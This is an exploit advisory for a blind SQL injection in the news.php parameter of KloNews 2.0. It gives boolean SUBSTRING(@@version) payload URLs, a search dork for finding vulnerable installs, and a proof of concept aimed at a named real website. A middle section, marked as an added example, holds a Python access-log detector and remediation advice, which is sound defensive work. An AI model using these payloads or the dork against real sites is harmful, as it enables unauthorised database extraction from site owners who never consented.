KloNews 2.0 Blind SQLi Vulnerability

[o] KloNews 2.0 Blind SQLi Vulnerability

Software : KloNews 2.0
Vendor : http://www.kloweb.net/
Author : NoGe


[o] Exploit

http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5 << True
http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4 << False
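
A defender can look for the True/False request pair above in web server access logs. The detector below is an added example, not part of the original advisory or the KloNews code base. It assumes Apache combined log format and that the True and False pages differ in response size. The log lines, the /klonews/ path, the IP addresses and the sizes are constructed sample data.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /klonews/news.php?news=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /klonews/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /klonews/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /klonews/news.php?news=abc HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3} (\d+|-)')
# A boolean test appended to the id: AND/OR followed by a comparison operator.
BOOL_RE = re.compile(r'\b(?:AND|OR)\b.+?(?:=|<|>|\bLIKE\b)', re.I)
# Numbers are the part that changes between probes; replace them to get the payload "shape".
CONST_RE = re.compile(r'\d+')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, size = m.groups()
    parts = urlsplit(target)
    # parse_qs decodes both '+' and %XX, so encoded payloads are normalised first
    value = parse_qs(parts.query, keep_blank_values=True).get("news", [None])[0]
    return ip, parts.path, value, int(size) if size != "-" else 0

def detect(log_text):
    findings, shapes = [], {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or rec[2] is None:
            continue
        ip, path, value, size = rec
        if value.isascii() and value.isdigit():
            continue  # legitimate numeric news id
        if not BOOL_RE.search(value):
            findings.append((ip, "non-numeric", value))
            continue
        findings.append((ip, "boolean-test", value))
        # Same client and payload shape with two response sizes: the page acts as a True/False oracle.
        key = (ip, path, CONST_RE.sub("N", value))
        sizes = shapes.setdefault(key, set())
        sizes.add(size)
        if len(sizes) == 2:
            findings.append((ip, "oracle-confirmed", key[2]))
    return findings
```

An "oracle-confirmed" finding means the responses to the injected condition differed, so the parameter is reaching the SQL query and should be cast to an integer or bound as a query parameter.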


[o] Dork

"Propulsé par KloNews"


[o] PoC

http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5
http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4
